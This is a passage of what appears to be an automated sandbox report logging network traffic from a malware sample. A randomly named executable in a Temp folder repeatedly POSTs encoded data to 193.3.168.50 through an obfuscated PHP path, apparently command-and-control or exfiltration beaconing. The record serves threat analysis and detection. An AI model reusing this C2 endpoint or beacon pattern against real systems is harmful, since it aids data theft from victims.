                                                                                                                  Data Ascii: _X_^YW_SZXQRU^Z_PQ]]Y^WF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[8 6<0 P&_./9 ):+'/8R#90,A#3 (-#G $],
                                                                                                                  Dec 5, 2024 10:53:28.439523935 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:28.677506924 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 59 24 05 01 0d 30 3c 09 1b 28 20 33 06 2e 55 34 03 27 3e 3e 19 27 2a 0a 0b 3d 29 2c 02 36 3d 2a 1e 3f 17 2f 55 3f 19 2c 56 2a 02 20 58 00 1a 26 59 37 32 3b 00 2d 29 20 11 24 2d 2e 5e 30 13 39 5f 2a 07 24 09 3e 30 28 54 26 10 25 09 29 23 3a 0c 38 1a 2e 07 2d 10 21 04 26 15 2a 52 0e 17 21 1b 29 10 2c 1c 37 22 26 0c 29 0f 0d 14 29 3c 2c 0f 26 3b 26 1b 23 2e 3d 1e 24 09 3e 0f 24 1c 22 52 27 28 02 07 26 01 2f 01 2b 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Y$0<( 3.U4'>>'*=),6=*?/U?,V* X&Y72;-) $-.^09_*$>0(T&%)#:8.-!&*R!),7"&))<,&;&#.=$>$"R'(&/+) _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.449752193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:27.322307110 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:27.674469948 CET1060OUTData Raw: 5f 5f 5f 5f 5c 5d 5a 52 5a 58 51 52 55 55 5a 5e 50 5f 5d 59 59 5e 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ____\]ZRZXQRUUZ^P_]YY^WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;!_?9;#&/Z%#$-+X',4=X$>##0)=#G $],-
                                                                                                                  Dec 5, 2024 10:53:28.562184095 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:28.797455072 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.449753193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:29.043292046 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:29.393503904 CET1060OUTData Raw: 5f 5a 5f 5c 5c 5a 5f 53 5a 58 51 52 55 52 5a 5d 50 53 5d 5c 59 52 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Z_\\Z_SZXQRURZ]PS]\YRWC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-8 ?)<!6,/-Z7: .7Y3# 3$B";>=#G $],1
                                                                                                                  Dec 5, 2024 10:53:30.282882929 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:30.517685890 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.449754193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:30.762357950 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:31.112122059 CET1060OUTData Raw: 5f 5e 5f 58 5c 5a 5a 52 5a 58 51 52 55 5e 5a 5c 50 53 5d 5c 59 5b 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _^_X\ZZRZXQRU^Z\PS]\Y[WD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.80<)4]7,?- <.#$<?#"X$'5 *-#G $],
                                                                                                                  Dec 5, 2024 10:53:32.009406090 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:32.245738029 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.449755193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:32.480103970 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:32.830878973 CET1060OUTData Raw: 5f 5c 5a 5c 5c 5b 5a 50 5a 58 51 52 55 5f 5a 5a 50 52 5d 53 59 52 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\Z\\[ZPZXQRU_ZZPR]SYRWG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.83"+ &/97'.+'?'72%[38!3#)#G $],
                                                                                                                  Dec 5, 2024 10:53:33.718775988 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.449756193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:33.812182903 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:34.159106016 CET1936OUTData Raw: 5f 5b 5f 5d 5c 5b 5f 55 5a 58 51 52 55 51 5a 5a 50 55 5d 5a 59 58 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _[_]\[_UZXQRUQZZPU]ZYXWA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.,0-]?*8]#:Z;?1]7_+,3']$,$R#"3$D!# >=#G $],=
                                                                                                                  Dec 5, 2024 10:53:35.050003052 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:35.285732031 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 26 01 24 15 3f 0d 33 02 06 08 28 1d 30 11 39 0d 3f 12 24 10 2d 44 25 14 2b 1c 3e 03 23 11 22 2d 32 5b 29 3a 37 56 2b 27 02 57 2a 02 20 58 00 1a 26 5c 34 21 24 5b 2e 5f 3c 1e 32 5b 21 04 27 13 2d 5a 3d 29 28 08 3d 0d 3b 0f 25 2d 22 53 3d 33 00 08 2c 34 2a 04 2e 3e 29 01 24 3f 2a 52 0e 17 21 51 2a 07 24 5e 37 22 3e 0c 29 22 24 07 3c 01 2c 0e 33 2b 32 18 20 2e 07 1c 33 09 39 1f 30 0b 2d 0b 27 3b 2b 5e 31 3c 38 5b 3d 39 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&$?3(09?$-D%+>#"-2[):7V+'W* X&\4!$[._<2[!'-Z=)(=;%-"S=3,4*.>)$?*R!Q*$^7">)"$<,3+2 .390-';+^1<8[=9 _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.449757193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:33.932337999 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:34.283932924 CET1060OUTData Raw: 5f 5f 5f 59 59 5b 5a 51 5a 58 51 52 55 54 5a 5a 50 5f 5d 5a 59 58 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ___YY[ZQZXQRUTZZP_]ZYXWF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.805^=9[7P%.?9[ 9'9$0 25^3$!37*-#G $],)
                                                                                                                  Dec 5, 2024 10:53:35.170809984 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:35.405895948 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.449758193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:35.652005911 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:36.002718925 CET1060OUTData Raw: 5f 5a 5a 58 5c 5c 5a 50 5a 58 51 52 55 5e 5a 5b 50 50 5d 5c 59 5b 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _ZZX\\ZPZXQRU^Z[PP]\Y[WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._85(*+ 6:;<=Y :'.Y'/ #%.$E5?)#G $],
                                                                                                                  Dec 5, 2024 10:53:36.889818907 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:37.125454903 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.449759193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:37.370738983 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:37.750035048 CET1056OUTData Raw: 5f 5c 5f 5f 59 5a 5f 55 5a 58 51 52 55 57 5a 5f 50 52 5d 59 59 5d 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\__YZ_UZXQRUWZ_PR]YY]WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[;5X?_775);/%X4):3;',729[$=/60+)#G $],5
                                                                                                                  Dec 5, 2024 10:53:38.607925892 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:38.841646910 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.449760193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:39.088969946 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:39.440166950 CET1056OUTData Raw: 5f 5c 5a 5b 59 58 5a 56 5a 58 51 52 55 57 5a 5f 50 57 5d 5a 59 5f 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\Z[YXZVZXQRUWZ_PW]ZY_WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._8 %Y?9\#%98?1 *;.07]3?0W#0=<E!#<R*-#G $],5
                                                                                                                  Dec 5, 2024 10:53:40.327800989 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.449761193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:40.566241026 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:40.952542067 CET1936OUTData Raw: 5a 5b 5a 5e 59 58 5f 52 5a 58 51 52 55 53 5a 5a 50 5f 5d 59 59 5d 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z[Z^YX_RZXQRUSZZP_]YY]WF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-8)X<0]78249,-?',3 Z$.<D50<R)=#G $],5
                                                                                                                  Dec 5, 2024 10:53:41.755453110 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:41.993649960 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 13 33 05 0a 55 30 3c 2b 51 3f 0d 38 13 39 20 20 01 27 58 3d 45 26 29 38 0a 2a 14 02 01 35 3e 2a 13 3f 17 2b 57 28 09 33 0a 2a 12 20 58 00 1a 26 5c 21 22 30 13 2d 5f 2c 10 31 03 32 5f 24 2d 2a 04 3d 07 24 0f 3d 0d 20 57 32 3d 21 0e 3d 1d 04 0b 2f 37 36 05 2e 10 0b 05 32 05 2a 52 0e 17 21 50 3d 2d 3f 06 20 0f 25 56 29 1f 09 15 29 3f 0e 0f 33 01 3e 52 34 10 2a 0a 27 09 21 52 25 31 22 53 25 28 23 5f 26 01 20 5d 3d 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%3U0<+Q?89 'X=E&)8*5>*?+W(3* X&\!"0-_,12_$-*=$= W2=!=/76.2*R!P=-? %V))?3>R4*'!R%1"S%(#_& ]= _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.449762193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:41.147509098 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:41.502707005 CET1060OUTData Raw: 5f 5d 5a 58 59 5f 5a 50 5a 58 51 52 55 54 5a 53 50 52 5d 52 59 53 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _]ZXY_ZPZXQRUTZSPR]RYSWC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/0<(X45*Z8%4 R.0#[%/3 2*3>D!3*#G $],)
                                                                                                                  Dec 5, 2024 10:53:42.385531902 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:42.617727041 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


